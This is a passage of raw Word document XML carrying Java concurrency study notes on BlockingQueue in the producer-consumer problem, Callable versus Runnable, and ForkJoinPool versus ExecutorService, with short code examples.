        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6162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751D996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0B930D2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236CCAC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AB981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4F7ABB7"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7C8345C5"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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We use an ArrayBlockingQueue of a specified size (CAPACITY) as the shared buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318A2E8"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The producer adds items to the queue using put(). If the queue is full, put() will block until space becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E805C"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The consumer removes items from the queue using take(). If the queue is empty, take() will block until an item becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF40B5"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BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30624030"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Automatic Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: BlockingQueue automatically handles the synchronization issues, so you don't need to manually use wait() and notify().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44454283"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Thread Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The put() and take() methods block the producer and consumer threads as needed, which simplifies the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30156399"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Higher-level Abstraction</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a higher-level abstraction for managing concurrency and is safer and easier to work with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AAD6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BFB8444"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synchronization problem, where multiple threads (producers and consumers) share a resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DE67D"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Using wait() and notify(), threads can communicate with each other to wait when the buffer is full or empty and notify when there is space or items to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5035AF"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BlockingQueue simplifies the implementation by handling synchronization internally and provides methods (put() and take()) to safely manage the shared buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684DEF8D" w14:textId="6235DF5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8" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B361DE3" w14:textId="0200728B" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="005A595A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="_Toc197867497"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Callable and Runnable. When should you use each</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p w14:paraId="07B47D69" w14:textId="5FE4B9FC" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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092"/>
        <w:gridCol w:w="4120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="0F6A95A9" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="323BECED"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3FFD1A63"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEA1D1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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="301661D0" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FC1E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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="112DF7B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turn value (void)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B85338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value of type V (generally T or any custom type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="07D5813D" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65B3430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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291E3A0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not throw checked exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A609E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 throw checked exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="0E1FD03E" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24CBB0B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Execution Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="354829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sult is returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C71358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result, typically using Future.get() to retrieve the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="68BAEB97" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75849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ed in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B9E4CC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ask doesn't need a result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02F4144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he task needs to return a result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="383CAD07" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65ECED1A"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 in ExecutorService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D50E8D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doesn't need results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34017D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provides the result via Future</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="334A5983" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AC6B9D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 for Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D42D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run() method has no return type (void)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AEF8EE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call() method returns a value of type V</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="41C52223" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4658BA6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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54F3C3A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task = () -&gt; { System.out.println("Task executed"); };</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26A5CD6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llable&lt;Integer&gt; task = () -&gt; { return 42; };</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42BB640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p w14:paraId="29F8DC5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p w14:paraId="4B2A159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The run() method in the Runnable interface does not return any result. It is defined as void run().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288AA10A"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The call() method in the Callable interface returns a result. It returns an object of type V, allowing you to capture the result of the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6950C10A"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p w14:paraId="5A0A969D"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It cannot throw checked exceptions. If a Runnable task throws an exception, it is unchecked (a RuntimeException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340FA25"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It allows throwing checked exceptions in its call() method. This gives Callable more flexibility to handle errors during task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC959F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Task Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D7AF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When a Runnable task is executed, it is submitted using ExecutorService.submit() or Executor.execute(), but it doesn't return any result, only executes the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B29FC8"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A Callable task is also submitted using ExecutorService.submit(), but it returns a Future object. The Future object can be used to obtain the result of the task once it has been completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA89DE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31BDEC53"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p>
    <w:p w14:paraId="5E2004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don’t need a result from the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D593589"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are executing a task that does not throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326781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is for side effects (e.g., updating some shared resource or performing an action) and doesn’t need to return any data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF8581"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can be executed by a thread without needing to report back to the caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651191A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6E0ECF0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Printing logs, updating a UI, processing a file, or triggering an action like sending an email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928FAF6"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Callable when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44308ADB"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he task to return a result after execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154BC515"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may throw checked exceptions that need to be handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D482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o retrieve the result of the task after it completes, which can be done by calling Future.get().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718F361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1E1B28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Running a task that computes a result, such as performing complex calculations or fetching data from a database, where the result is required for further processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDA717"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Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FE1B0"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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65620FF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ervice;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0AD68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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D43563" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6810C9B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6716640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107D52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048921F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E9EB8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unnable task = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDAD9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being executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8D33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9CAE3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37784B2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task);  // No result returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7A25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D4B733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28EF03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A38BC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D3765C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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414789FC"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70855F76" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AC26A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CallableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254C1F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throws InterruptedException, ExecutionException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1277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5975110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1AD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allable&lt;Integer&gt; task = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B385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allable Task is being executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1207215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42;  // Return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36963AE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C5F84C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77537E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uture&lt;Integer&gt; future = executorService.submit(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE9DE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uture.get();  // Get the result from the Callable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D03A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F2223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esult from Callable Task: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C177E2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C50A1A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2C5534C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D7160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574F2EB"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5297FC2F"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Use when you don't need a result, and the task doesn’t need to throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2769C"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Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need a result from the task or when the task might throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D08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9" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55932562" w14:textId="57287523" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00E57F37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="_Toc197867498"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is ForkJoinPool in Java and how does it differ from normal </w:t>
      </w:r>
      <w:r w:rsidR="008C0D7E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="284"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D7F99" w14:textId="05F0AFA9" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4F06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Features of ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28176F13"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Work Stealing Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CFFAD"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In ForkJoinPool, when a thread finishes executing its task, it can "steal" work from other threads' task queues. This helps keep all threads busy and improves overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9462B"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RecursiveTask and RecursiveAction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5D3E8"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uses two key classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F67E3"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Task&lt;V&gt;: A subclass of ForkJoinTask that computes a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C214C00"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Action: A subclass of ForkJoinTask that does not return a result but performs some computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646D825A"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Parallelism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E952E"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The pool allows tasks to be recursively split into smaller tasks (forked) and recombined (joined). This approach is ideal for divide-and-conquer problems like sorting, matrix multiplication, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1DE16D"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Optimized for Divide-and-Conquer Algorithms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DD2AA"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Usage of ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313966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ForkJoinPool Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001FF3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7A830E0" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A67EA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ForkJoinPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AC5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79B62C6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 forkJoinPool = new ForkJoinPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD283D2" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1317FAD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ask that adds numbers recursively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDCA2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cursiveTask&lt;Integer&gt; task = new RecursiveTask&lt;Integer&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384092F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053811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tected Integer compute() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C74B9"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sum = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66B27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xample base case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9C0E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1; i &lt;= 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CAE5F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um += i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE5127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0241F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sum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA49D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4DEDF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090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D65AB31"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orkJoinPool.invoke(task);  // Executes the task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20656CB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Sum: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0964C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shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B0EA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1D6AD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89C09"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418F1C36">
          <v:rect id="_x0000_i1830" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6EE9E"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vs ExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D0C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Both ForkJoinPool and the regular ExecutorService are part of the java.util.concurrent package, but they have different purposes and characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365053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Purpose and Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586511E"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CE2DDF0"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general-purpose task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56692B8F"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is suited for tasks that don’t necessarily need to be recursively split or are not inherently parallelizable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8F208"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Regular ExecutorService tasks are submitted as independent tasks, and threads from a fixed pool or a cached pool execute them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129D1A8"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5C5CEF13"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parallel tasks that can be split into smaller subtasks (divide-and-conquer tasks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C8BF5"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optimizes recursive tasks by using work-stealing to balance the load across threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A230F6"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Best suited for parallel recursive algorithms that involve breaking a problem into smaller subproblems and then combining the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D2A0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Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19832904"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7C92E55"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in an ExecutorService are allocated based on the thread pool type (e.g., fixed-size, cached, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C034F57"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are reused for multiple tasks, and once a task completes, the thread waits for another task to be assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06079BFE"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Doesn't optimize for recursive task decomposition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF81B83"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0544724B"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 xml:space="preserve">ForkJoinPool uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>work-stealing</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> algorithm, where idle threads can steal tasks from busy threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE16AE8"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It’s highly efficient for tasks that can be divided into smaller tasks that can be run in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF20F2"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e pool dynamically adjusts based on the number of available processors, meaning it’s designed to take advantage of multi-core systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FB584"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3. Task Submission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05533504"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425866F"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submitted to an ExecutorService are usually Runnable or Callable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA34212"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he service handles the execution, but the tasks are typically independent of each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A55AD"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B259CF8"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in a ForkJoinPool are ForkJoinTask objects (RecursiveTask or RecursiveAction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03CF1A"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are usually recursively split into subtasks that are forked and joined. The pool automatically manages the splitting and merging of tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462CFFC5"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e Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D14FD"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8FB0161"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Suitable for simpler, independent tasks where there is no need for recursive task decomposition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3070CD6A"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thread pool management for background tasks, handling large numbers of independent I/O-bound tasks, or running batch jobs that don't need recursive parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728539EA"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C0BC11D"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Best suited for tasks that can be split into smaller, independent sub-tasks that can run concurrently (divide-and-conquer algorithms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC6028"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parallel sorting (e.g., ForkJoinPool is used for parallel sorting in Java 8), matrix operations, and large-scale computations that involve recursion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201CAA8"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5. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C846A0"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434A5FC9"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The regular ExecutorService is more flexible and easier to use for non-recursive tasks, but it may not perform as well as ForkJoinPool when dealing with recursive tasks.</w:t>
      </w:r>
    </w:p>
